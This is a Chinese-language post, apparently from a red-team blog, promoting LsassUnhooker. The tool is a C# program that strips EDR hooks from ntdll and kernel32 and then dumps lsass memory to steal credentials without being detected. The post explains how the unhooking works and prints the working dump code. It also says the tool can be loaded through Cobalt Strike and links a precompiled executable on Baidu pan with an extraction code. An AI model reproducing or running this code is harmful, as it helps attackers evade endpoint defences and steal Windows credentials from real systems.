LsassUnhooker - 一款可用于繞過EDR掛鉤轉儲lsass進程的工具

LsassUnhooker

用C#編寫的小程序可以繞過EDR鉤子并轉儲lsass進程的內容，框架：.NET Framework 4，可以用CobaltStrike execute-assembly加載內存執行，集成至CS插件。

LsassUnhooker項目地址：

https://github.com/roberreigada/LsassUnhooker

SharpUnhooker項目地址：

https://github.com/GetRektBoy724/SharpUnhooker

該代碼使用SharpUnhooker項目，由@GetRektBoy724創建，工作方式如下：

1. 它使用“PE parser stuff”讀取并復制.text section原始（磁盤中）DLL
2. 它使用和從D/Invoke修補.text section加載的DLL（以更改內存的權限）Marshal.Copy、NtProtectVirtualMemory
3. 它通過再次讀取來檢查修補的內存中 DLL，并將其與原始 DLL 進行比較，以查看其是否正確修補。

通過使用SharpUnhooker和MiniDumpWriteDump函數，我能夠繞過多個EDR并設法在不被發現的情況下轉儲lsass的內容，這是解決問題的代碼：

SilentUnhooker("ntdll.dll");SilentUnhooker("kernel32.dll");String dumpFileName = Directory.GetCurrentDirectory() + "\\" + "lsass.dmp";if (System.IO.File.Exists(dumpFileName)){  System.IO.File.Delete(dumpFileName);}IntPtr hFile = NativeMethods.CreateFile(dumpFileName, NativeMethods.EFileAccess.GenericWrite, NativeMethods.EFileShare.None, lpSecurityAttributes: IntPtr.Zero, dwCreationDisposition: NativeMethods.ECreationDisposition.CreateAlways, dwFlagsAndAttributes: NativeMethods.EFileAttributes.Normal, hTemplateFile: IntPtr.Zero);NativeMethods._MINIDUMP_TYPE dumpType = NativeMethods._MINIDUMP_TYPE.MiniDumpWithFullMemory;var proc = Process.GetProcessesByName("lsass").FirstOrDefault();var exceptInfo = new NativeMethods.MINIDUMP_EXCEPTION_INFORMATION();var result = NativeMethods.MiniDumpWriteDump(proc.Handle, proc.Id, hFile, dumpType, ref exceptInfo, UserStreamParam: IntPtr.Zero, CallbackParam: IntPtr.Zero);if (result == true) {  Console.WriteLine("lsass process was successfully dumped in " + Directory.GetCurrentDirectory() + "\\" + "lsass.dmp");}else {  Console.WriteLine("Error dumping lsass process");}

已經編譯好的LsassUnhooker.exe文件：

鏈接：https://pan.baidu.com/s/1VaqGK-FnyvsveN3hrz5XwA

提取碼：z78j